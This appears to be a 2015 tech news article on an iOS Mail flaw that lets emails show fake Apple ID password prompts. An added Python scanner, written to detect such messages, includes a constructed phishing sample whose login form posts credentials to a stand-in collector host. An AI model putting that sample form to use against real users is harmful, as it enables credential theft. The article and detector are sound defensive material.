
Warning: Major iPhone security flaw makes it painfully easy to steal your password

Published Jun 10th, 2015 10:18AM EDT
[Image: iPhone security flaw. Credit: Zach Epstein, BGR]


Apple’s iOS platform is one of the most secure mobile operating systems in the world, and each release brings new security features and enhancements. iPhones and iPads are proliferating in the workplace at a rapid pace, and even intelligence agencies reportedly struggle to crack encrypted communications that originate on an iOS device.

But no software is without flaws, and a newly disclosed vulnerability in the iOS Mail app makes iPhones and iPads painfully vulnerable to a phishing scam that can easily let someone steal your Apple ID username and password.


Ernst & Young security researcher Jan Soucek has published a proof-of-concept tool that could easily trick iPhone and iPad users into handing over the usernames and passwords tied to their email accounts or even their Apple IDs.

As noted by The Register, Soucek’s tool takes advantage of a flaw in Apple’s iOS Mail app: an HTML tag that Mail should ignore is instead honored, so a message can load remote HTML content that replaces the body of the original email. Mail disables JavaScript in the view that renders the message, but that does not matter here. The researcher built, from plain HTML and CSS, a pop-up that looks exactly like the dialog box iOS shows when it needs the user to re-enter his or her email credentials or Apple ID password.

Unsuspecting victims are so used to seeing these dialog boxes that the odds are good they would just enter their email addresses and passwords without thinking twice. Once that information is entered and the user taps OK, the credentials are submitted to an attacker-controlled server. The genuine prompt is a system dialog; the fake one is simply part of the message being read. Until a fix ships, the safer habit is to dismiss any credential prompt that appears while reading a message and re-enter the password from the Settings app instead.

“Back in January 2015 I stumbled upon a bug in iOS’s mail client, resulting in an HTML tag in e-mail messages not being ignored,” Soucek said on the GitHub page hosting his project. “This bug allows remote HTML content to be loaded, replacing the content of the original email message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS. It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2.”
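The article describes the collector only in outline: a message that pulls in remote HTML, and a login-looking form that works without JavaScript. For a mail gateway or incident responder, the useful question is how to flag such a message on the way in. The script below is an added example written for this page; it is not Soucek’s tool, nor anything from Apple. The page does not name the offending HTML tag or the way the form submits its data, so the script assumes two JavaScript-free mechanisms a scanner would look for: a `<meta http-equiv="refresh">` pointing at a remote URL, and a `<form>` whose `action` posts to a remote host and which contains a password field. The sample message embedded at the bottom is constructed for the example, and `collector.example.org` is a reserved example hostname, not a real server.

```python
"""Flag HTML e-mail parts that could act as a JavaScript-free credential collector.

Added example for this article (not the researcher's tool or Apple's code).
Assumptions: the remote load is a meta refresh, and the collector is a plain
HTML form posting to a remote host. The sample message below is constructed.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class _CollectorScanner(HTMLParser):
    """Collect meta refreshes, form actions and password inputs from one HTML part."""

    def __init__(self):
        super().__init__()
        self.meta_refresh_urls = []
        self.form_actions = []
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        # Attributes without a value arrive as None; normalise to "".
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content typically looks like: 0; url=https://host/path
            for piece in a.get("content", "").split(";"):
                piece = piece.strip()
                if piece.lower().startswith("url="):
                    self.meta_refresh_urls.append(piece[4:].strip().strip("'\""))
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1


def _is_remote(url):
    """True when the URL names a network host (not relative, not inline)."""
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)


def scan_html(html):
    """Return a list of finding strings for one HTML body."""
    s = _CollectorScanner()
    s.feed(html)
    findings = []
    for u in s.meta_refresh_urls:
        if _is_remote(u):
            findings.append(f"meta refresh to remote URL {urlparse(u).netloc}")
    for action in s.form_actions:
        if _is_remote(action):
            kind = "credential form" if s.password_inputs else "form"
            findings.append(f"{kind} posting to remote host {urlparse(action).netloc}")
    return findings


def scan_message(raw):
    """Parse a raw RFC 5322 message (bytes) and scan every text/html part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings


# Constructed sample message: the HTML part both redirects to a remote page and
# carries a login-looking form. The hostname is a reserved example domain.
SAMPLE_EML = b"""From: billing@example.com
To: victim@example.net
Subject: Action required
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><head>
<meta http-equiv="refresh" content="0; url=https://collector.example.org/login.html">
</head><body>
<form action="https://collector.example.org/collect" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="OK">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML):
        print("FLAG:", finding)
```

Run it as a script to see the two findings for the sample, or call `scan_message()` on the raw bytes of any `.eml` file. The check is deliberately narrow: it only flags the two mechanisms named in the lead-in, so a message that uses a different tag to pull in remote content would pass it. Treat it as one signal among several, not as a complete filter.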

As the researcher notes, Apple had not addressed the issue as of publication, despite the bug having been reported in January.

Zach Epstein, Executive Editor, BGR